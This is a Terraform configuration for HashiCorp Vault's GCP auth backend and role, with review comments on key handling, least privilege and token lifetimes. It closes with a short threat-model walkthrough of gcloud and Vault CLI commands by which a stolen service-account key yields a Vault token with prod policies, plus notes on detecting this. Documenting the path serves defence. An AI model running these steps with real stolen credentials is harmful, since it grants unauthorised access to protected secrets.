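# GCP auth method mount. Vault uses `credentials` (a GCP service-account key)
# to call the IAM/Compute APIs while verifying login JWTs. Keep credentials.json
# out of version control; if Vault itself runs on GCP with an attached service
# account, `credentials` can be omitted so no long-lived key file exists at all.
resource "vault_gcp_auth_backend" "example" {
  backend = "gcp"
  # Idiom fix: `file()` is called directly. The legacy "${...}" wrapper is
  # redundant since Terraform 0.12, and this file already uses 0.12-style
  # references (vault_gcp_auth_backend.example.backend below).
  credentials = file("credentials.json")
  project_id  = "my-gcp-project"
  # NOTE(review): in the provider versions I know, bound_projects is a *role*
  # argument of vault_gcp_auth_backend_role, not a mount argument — confirm
  # against the provider docs; if rejected here, move it into the role below.
  bound_projects = ["my-gcp-project"]
}

# Role for IAM-type logins. A caller proves control of a GCP service account by
# presenting a JWT signed by that account (its aud names this role, e.g.
# "vault/my-role"); Vault verifies the signature through the IAM API and issues a
# token carrying `policies`.
resource "vault_gcp_auth_backend_role" "my_role" {
  backend = vault_gcp_auth_backend.example.backend
  role    = "my-role"
  type    = "iam"
  # Least privilege: one role hands out dev AND prod policies, so anyone holding
  # a key for the bound service account (or iam.serviceAccounts.signJwt on it)
  # gets prod access. Prefer one role per environment with only its own policy.
  policies = ["default", "dev", "prod"]
  # bound_service_accounts is the only gate on this role: possession of a key
  # for this account is sufficient to log in. Rotate the key on any suspected
  # exposure and restrict who may create keys for / sign JWTs as it in GCP IAM.
  bound_service_accounts = ["my-service-account@my-gcp-project.iam.gserviceaccount.com"]
  # Optional hardening, not set here: max_jwt_exp (Vault default 15m) caps how
  # long a minted login JWT stays usable; token_ttl / token_max_ttl bound the
  # lifetime of the Vault token that a successful login returns.
}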
# Attacker path against the role above: a stolen or leaked key for a service
# account listed in bound_service_accounts is, by itself, enough to obtain a
# Vault token with every policy on the role.

# 1. Authenticate gcloud as the compromised service account.
gcloud auth activate-service-account --key-file=attacker-controlled-account.json

# 2. Point the Vault CLI at the server. Plain HTTP is only acceptable for a
#    local listener; anywhere else use https, or the returned token crosses the
#    wire in cleartext.
VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_ADDR

# 3. Log in with a JWT signed by the service account. Not shown: minting the
#    JWT (e.g. via the IAM signJwt API); it must carry aud "vault/my-role" and
#    an exp within the role's max_jwt_exp (Vault default 15m). The value below
#    is a truncated placeholder.
#    Detection: the Vault audit log records auth/gcp/login for this role; GCP
#    audit logs show the key use / signJwt call if data-access logging is on.
vault write auth/gcp/login role="my-role" jwt="eyJhbGciOiJSUzI1NiIsImtpZCI6I..."